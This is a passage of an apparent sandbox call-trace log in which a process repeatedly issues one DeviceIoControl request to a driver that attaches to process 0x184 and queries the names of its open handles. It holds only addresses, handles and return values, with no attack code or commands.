nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.887] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.887] PsAcquireProcessExitSynchronization () returned 0x0 [0221.887] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.887] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00189db20, HandleInformation=0x0) returned 0x0 [0221.887] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.887] PsReleaseProcessExitSynchronization () returned 0x2 [0221.887] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.887] ObQueryNameString (in: Object=0xfffff8a00189db20, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.888] ObfDereferenceObject (Object=0xfffff8a00189db20) returned 0x1 [0221.888] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.888] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.888] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.888] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.888] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.888] PsAcquireProcessExitSynchronization () returned 0x0 [0221.888] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.888] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018a2f30, HandleInformation=0x0) returned 0x0 [0221.888] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.888] PsReleaseProcessExitSynchronization () returned 0x2 [0221.888] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.888] ObQueryNameString (in: Object=0xfffff8a0018a2f30, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.888] ObfDereferenceObject (Object=0xfffff8a0018a2f30) returned 0x1 [0221.888] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.888] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.888] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.888] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.888] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.888] PsAcquireProcessExitSynchronization () returned 0x0 [0221.888] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.888] ObReferenceObjectByHandle (in: Handle=0x530, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018a19e0, HandleInformation=0x0) returned 0x0 [0221.888] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.888] PsReleaseProcessExitSynchronization () returned 0x2 [0221.889] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.889] ObQueryNameString (in: Object=0xfffff8a0018a19e0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.889] ObfDereferenceObject (Object=0xfffff8a0018a19e0) returned 0x1 [0221.889] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.889] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.889] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.889] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.889] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.889] PsAcquireProcessExitSynchronization () returned 0x0 [0221.889] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.889] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00183fb00, HandleInformation=0x0) returned 0x0 [0221.889] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.889] PsReleaseProcessExitSynchronization () returned 0x2 [0221.889] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.889] ObQueryNameString (in: Object=0xfffff8a00183fb00, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.889] ObfDereferenceObject (Object=0xfffff8a00183fb00) returned 0x1 [0221.889] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.889] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.889] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.889] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.889] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.889] PsAcquireProcessExitSynchronization () returned 0x0 [0221.889] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.890] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018a7e30, HandleInformation=0x0) returned 0x0 [0221.890] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.890] PsReleaseProcessExitSynchronization () returned 0x2 [0221.890] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.890] ObQueryNameString (in: Object=0xfffff8a0018a7e30, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.890] ObfDereferenceObject (Object=0xfffff8a0018a7e30) returned 0x1 [0221.890] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.890] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.890] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.890] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.890] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.890] PsAcquireProcessExitSynchronization () returned 0x0 [0221.890] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.890] ObReferenceObjectByHandle (in: Handle=0x560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018b0ee0, HandleInformation=0x0) returned 0x0 [0221.890] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.890] PsReleaseProcessExitSynchronization () returned 0x2 [0221.890] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.890] ObQueryNameString (in: Object=0xfffff8a0018b0ee0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.890] ObfDereferenceObject (Object=0xfffff8a0018b0ee0) returned 0x1 [0221.890] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.890] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.890] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.891] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.891] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.891] PsAcquireProcessExitSynchronization () returned 0x0 [0221.891] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.891] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018adf30, HandleInformation=0x0) returned 0x0 [0221.891] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.891] PsReleaseProcessExitSynchronization () returned 0x2 [0221.891] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.891] ObQueryNameString (in: Object=0xfffff8a0018adf30, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.891] ObfDereferenceObject (Object=0xfffff8a0018adf30) returned 0x1 [0221.891] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.891] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.891] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.891] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.891] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.891] PsAcquireProcessExitSynchronization () returned 0x0 [0221.891] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.891] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018b4d60, HandleInformation=0x0) returned 0x0 [0221.891] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.891] PsReleaseProcessExitSynchronization () returned 0x2 [0221.891] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.891] ObQueryNameString (in: Object=0xfffff8a0018b4d60, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.891] ObfDereferenceObject (Object=0xfffff8a0018b4d60) returned 0x1 [0221.891] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.892] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.892] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.892] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.892] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.892] PsAcquireProcessExitSynchronization () returned 0x0 [0221.892] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.892] ObReferenceObjectByHandle (in: Handle=0x590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018aee60, HandleInformation=0x0) returned 0x0 [0221.892] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.892] PsReleaseProcessExitSynchronization () returned 0x2 [0221.892] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.313] ObQueryNameString (in: Object=0xfffff8a0018aee60, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.313] ObfDereferenceObject (Object=0xfffff8a0018aee60) returned 0x1 [0222.313] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.314] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.314] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.314] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.314] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.314] PsAcquireProcessExitSynchronization () returned 0x0 [0222.314] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.314] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018bc450, HandleInformation=0x0) returned 0x0 [0222.314] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.314] PsReleaseProcessExitSynchronization () returned 0x2 [0222.314] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.314] ObQueryNameString (in: Object=0xfffff8a0018bc450, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.314] ObfDereferenceObject (Object=0xfffff8a0018bc450) returned 0x1 [0222.314] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.314] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.315] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.315] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.315] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.315] PsAcquireProcessExitSynchronization () returned 0x0 [0222.315] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.315] ObReferenceObjectByHandle (in: Handle=0x5b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018c2eb0, HandleInformation=0x0) returned 0x0 [0222.315] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.315] PsReleaseProcessExitSynchronization () returned 0x2 [0222.315] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.315] ObQueryNameString (in: Object=0xfffff8a0018c2eb0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.315] ObfDereferenceObject (Object=0xfffff8a0018c2eb0) returned 0x1 [0222.315] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.315] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.316] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.316] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.316] PsAcquireProcessExitSynchronization () returned 0x0 [0222.316] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.316] ObReferenceObjectByHandle (in: Handle=0x5c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018c2820, HandleInformation=0x0) returned 0x0 [0222.316] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.316] PsReleaseProcessExitSynchronization () returned 0x2 [0222.316] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.316] ObQueryNameString (in: Object=0xfffff8a0018c2820, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.316] ObfDereferenceObject (Object=0xfffff8a0018c2820) returned 0x1 [0222.316] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.317] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.317] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.317] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.317] PsAcquireProcessExitSynchronization () returned 0x0 [0222.317] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.317] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018c3700, HandleInformation=0x0) returned 0x0 [0222.317] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.317] PsReleaseProcessExitSynchronization () returned 0x2 [0222.317] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.317] ObQueryNameString (in: Object=0xfffff8a0018c3700, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.317] ObfDereferenceObject (Object=0xfffff8a0018c3700) returned 0x1 [0222.317] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.317] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.317] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.317] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.317] PsAcquireProcessExitSynchronization () returned 0x0 [0222.317] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.317] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018c9b30, HandleInformation=0x0) returned 0x0 [0222.317] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.318] PsReleaseProcessExitSynchronization () returned 0x2 [0222.318] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.318] ObQueryNameString (in: Object=0xfffff8a0018c9b30, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.318] ObfDereferenceObject (Object=0xfffff8a0018c9b30) returned 0x1 [0222.318] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.318] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.318] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.318] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.318] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.318] PsAcquireProcessExitSynchronization () returned 0x0 [0222.318] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.318] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018bfa90, HandleInformation=0x0) returned 0x0 [0222.318] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.318] PsReleaseProcessExitSynchronization () returned 0x2 [0222.318] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.318] ObQueryNameString (in: Object=0xfffff8a0018bfa90, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.318] ObfDereferenceObject (Object=0xfffff8a0018bfa90) returned 0x1 [0222.318] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.318] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.318] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.318] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.318] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 